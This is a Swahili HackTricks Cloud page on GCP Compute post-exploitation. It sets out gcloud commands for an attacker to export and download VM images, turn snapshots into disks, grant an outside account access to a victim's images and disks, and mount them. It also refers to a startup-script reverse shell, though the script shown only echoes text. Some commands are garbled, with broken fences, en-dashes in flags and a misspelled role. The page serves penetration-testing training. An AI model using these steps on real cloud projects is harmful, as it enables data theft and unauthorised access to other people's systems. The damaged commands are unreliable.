GCP - Compute Post Exploitation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Compute

Kwa taarifa zaidi kuhusu Compute na VPC (Networking) angalia:

GCP - Compute Enum

Export & Inspect Images locally

Hii itamruhusu mshambuliaji kupata data iliyomo ndani ya images tayari zilizopo au kuunda images mpya za running VMs na kupata data zao bila kuwa na ufikiaji wa running VM.

Inawezekana ku-export image ya VM kwenda bucket kisha ku-download na kui-mount ndani ya mashine yako kwa amri:

Export na download image ya VM

```bash gcloud compute images export --destination-uri gs:///image.vmdk --image imagetest --export-format vmdk # The download the export from the bucket and mount it locally ```

Kabla ya kutekeleza kitendo hiki mshambuliaji anaweza kuhitaji ruhusa juu ya storage bucket na kwa hakika ruhusa juu ya cloudbuild kwani ndiyo service itakayoulizwa kutekeleza export
Zaidi ya hayo, ili hili lifanye kazi, codebuild SA na compute SA zinahitaji ruhusa za kipekee.
The cloudbuild SA <project-id>@cloudbuild.gserviceaccount.com inahitaji:

roles/iam.serviceAccountTokenCreator
roles/compute.admin
roles/iam.serviceAccountUser

Na SA <project-id>-compute@developer.gserviceaccount.com inahitaji:

oles/compute.storageAdmin
roles/storage.objectAdmin

Export & Inspect Snapshots & Disks kwa ndani

Haiwezekani ku-export snapshots na disks moja kwa moja, lakini inawezekana kubadilisha snapshot kuwa disk, disk kuwa image na kwa kufuata sehemu iliyopita, export ile image ili kuichunguza kwa eneo lako la ndani

Create disk from snapshot and image from disk

```bash # Create a Disk from a snapshot gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]

Create an image from a disk

gcloud compute images create [IMAGE_NAME] –source-disk=[NEW_DISK_NAME] –source-disk-zone=[ZONE]

</details>

### Kagua Image inayounda VM

Kwa lengo la kupata **data iliyohifadhiwa katika image** au ndani ya **VM inayokimbia** kutoka mahali ambapo mshambuliaji **ameunda image,** inawezekana kumpa akaunti ya nje ufikiaji wa image:

<details>

<summary>Toa ufikiaji kwa image na unda VM</summary>
```bash
gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'

kisha unda VM mpya kutoka kwa image hiyo:

Unda instance ya VM kutoka kwa image

```bash gcloud compute instances create [INSTANCE_NAME] \ --project=[TARGET_PROJECT_ID] \ --zone=[ZONE] \ --image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME] ```

Ikiwa huwezi kumpa akaunti yako ya nje ufikiaji wa image, unaweza kuzindua VM ukitumia image hiyo katika mradi la mwathiri na fanya metadata itekeleze reverse shell ili kupata ufikiaji wa image kwa kuongeza param:

Unda VM yenye reverse shell katika metadata

```bash --metadata startup-script='#! /bin/bash echo "hello"; ' ```

Kagua Snapshot/Disk kwa kuiambatisha kwenye VM

Kwa lengo la kupata data iliyohifadhiwa kwenye disk au snapshot, unaweza kubadili snapshot kuwa disk, disk kuwa image na kufuata hatua zilizotangulia.

Au unaweza kumpa akaunti ya nje ufikiaji juu ya disk (ikiwa chanzo ni snapshot, mpa ufikiaji juu ya snapshot au unda disk kutoka kwake):

Toa ruhusa kwa disk

```bash gcloud projects add-iam-policy-binding [PROJECT_ID] \ --member='user:[USER_EMAIL]' \ --role='roles/compute.storageAdmin' ```

Ambatanisha diski kwa instance:

Ambatanisha diski kwa instance

```bash gcloud compute instances attach-disk [INSTANCE_NAME] \ --disk [DISK_NAME] \ --zone [ZONE] ```

Chomeka diski ndani ya VM:

SSH into the VM:

SSH kwenye VM na chomeka diski

gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]

Tambua Diski: Mara ukiwa ndani ya VM, tambua diski mpya kwa kuorodha vifaa vya diski. Kawaida, unaweza kuipata kama /dev/sdb, /dev/sdc, n.k.
Fomati na Chomeka Diski (ikiwa ni diski mpya au raw):

Tengeneza mount point:

Tengeneza mount point na chomeka

sudo mkdir -p /mnt/disks/[MOUNT_DIR]

Chomeka diski:

Chomeka kifaa cha diski

sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]

Ikiwa huwezi kutoa ufikiaji kwa project ya nje kwa snapshot au diski, unaweza kuhitaji pfanya hatua hizi ndani ya instance katika project ile ile kama snapshot/diski.

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.